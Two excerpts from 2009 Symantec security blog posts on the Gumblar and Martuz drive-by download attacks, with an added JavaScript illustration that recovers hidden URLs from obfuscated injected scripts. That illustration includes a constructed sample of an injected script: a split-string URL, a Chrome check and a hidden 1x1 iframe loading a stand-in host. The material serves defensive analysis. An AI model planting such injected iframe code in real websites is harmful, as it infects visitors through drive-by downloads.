Symantec Blogs: Security Response

John H | May 19th, 2009

The malicious code Whac-a-Mole game continues. Just as security vendors start detecting the domains and malware associated with the drive-by download attacks coming from the malicious Gumblar domains, the bad guys are changing the game and popping up from Martuz dot cn, which, according to Who.is, is hosted in the UK on a 95.129.x.x IP address. The JavaScript injected into the compromised websites has also become more obfuscated, making the attacks slightly harder for IT managers and Web administrators to detect. The attackers can easily vary the obfuscation by assigning portions of the domain name to variables and concatenating them at run time instead of spelling out the domain as a single string, so a signature that looks for the literal domain no longer matches. The updated malicious JavaScript also tests the visitor's browser and delivers a different payload to Google Chrome users, since Chrome checks sites against a blacklist of suspicious and malicious domains.
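As an added illustration (this is not code from the Symantec post, and it is not the actual Gumblar or Martuz script), the block below builds a harmless stand-in that shows the two tricks described above: a URL assembled from split string variables, and a branch on navigator.userAgent. It then statically folds the string constants back together, so an administrator who finds such a script on a compromised site can recover the hidden domain without ever executing attacker-supplied JavaScript. The sample script, the domain example.invalid, and all function names are assumptions made for the example.

```javascript
// Added example, not from the Symantec post. SAMPLE is a constructed, harmless
// stand-in for the kind of injected script the post describes; the domain
// example.invalid is made up and the code is never executed, only parsed.
const SAMPLE = `
var a = "exa", b = "mple", c = ".inv" + "alid";
var u = "http://" + a + b + c + "/in.php";
if (navigator.userAgent.indexOf("Chrome") == -1) {
  document.write('<iframe src="' + u + '" width=1 height=1></iframe>');
}
`;

// A single term we are willing to fold: a string literal or an identifier.
const TERM = /"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|[A-Za-z_$][\w$]*/;
const TERM_SRC = "(?:" + TERM.source + ")";
// A right-hand side made only of terms joined by '+'. Calls, arithmetic and
// HTML attribute noise (width=1, src="...") fail this test and are ignored.
const CONCAT_RE = new RegExp(
  "^\\s*" + TERM_SRC + "(?:\\s*\\+\\s*" + TERM_SRC + ")*\\s*$"
);
// name = expr, ending at ',' ';' or end of line; '==' is excluded.
const ASSIGN_RE = /\b([A-Za-z_$][\w$]*)\s*=(?!=)\s*([^;,\n]+)/g;

// Split a folded expression into string and identifier tokens. The '+'
// operators are dropped because concatenation is implied by token order;
// escape sequences inside literals are kept verbatim.
function tokenize(expr) {
  const re = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'|([A-Za-z_$][\w$]*)|(\+)/g;
  const tokens = [];
  let m;
  while ((m = re.exec(expr)) !== null) {
    if (m[1] !== undefined) tokens.push({ type: "str", value: m[1] });
    else if (m[2] !== undefined) tokens.push({ type: "str", value: m[2] });
    else if (m[3] !== undefined) tokens.push({ type: "id", value: m[3] });
  }
  return tokens;
}

// Collect every assignment whose right-hand side is pure string concatenation.
// A later assignment to the same name overrides an earlier one.
function collectAssignments(src) {
  const vars = new Map();
  for (const m of src.matchAll(ASSIGN_RE)) {
    const rhs = m[2].trim();
    if (CONCAT_RE.test(rhs)) vars.set(m[1], rhs);
  }
  return vars;
}

// Fold one variable to its constant value, following references to other
// folded variables. Returns null if anything is unresolvable or cyclic.
function resolve(name, vars, depth = 0) {
  if (depth > 32 || !vars.has(name)) return null;
  let out = "";
  for (const t of tokenize(vars.get(name))) {
    if (t.type === "str") { out += t.value; continue; }
    const inner = resolve(t.value, vars, depth + 1);
    if (inner === null) return null;
    out += inner;
  }
  return out;
}

// Map of variable name -> fully folded string for every resolvable variable.
function resolveAll(src) {
  const vars = collectAssignments(src);
  const folded = new Map();
  for (const name of vars.keys()) {
    const v = resolve(name, vars);
    if (v !== null) folded.set(name, v);
  }
  return folded;
}

// The URLs hidden in the script, deduplicated, in first-seen order.
function recoverUrls(src) {
  const seen = new Set();
  for (const v of resolveAll(src).values()) {
    if (/^https?:\/\//i.test(v)) seen.add(v);
  }
  return [...seen];
}

// Crude signal for per-browser payload selection: the script consults the
// user agent string at all. A real triage step would look at the branches.
function hasUserAgentBranch(src) {
  return /navigator\.userAgent/.test(src);
}

console.log(recoverUrls(SAMPLE), hasUserAgentBranch(SAMPLE));
```

The folding is deliberately narrow: it only reassembles plain string literals and identifiers, which is exactly the layer of obfuscation the post describes, and it refuses anything else rather than guessing. Scripts that add charCode packing or an eval layer on top need a further unpacking step, but the point stands: recover the indicator from the constants, never by running the script in a browser.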

The drive-by download tries to exploit a number of underlying vulnerabilities, including some...

John H | May 15th, 2009

Symantec Security Response has been monitoring a recent spate of Web-based attacks and drive-by downloads from compromised websites that are infecting end-users' computers. This latest round of attacks carries a payload that maliciously alters Web search engine results on the compromised machines. There have also been some recent blog posts and articles about compromised websites serving drive-by downloads, including malware, with obfuscated attacks coming from a malicious Gumblar domain in China. Yes, we have seen a short-term increase in attacks, but the reality is that this is unfortunately just another day on the Web, and it reflects what we reported in our Web Based Attacks: February 2009 whitepaper. For instance, Symantec documented attacks from more than 800,000 unique domains last year.

We have been proactively blocking these latest attacks with our network IPS in...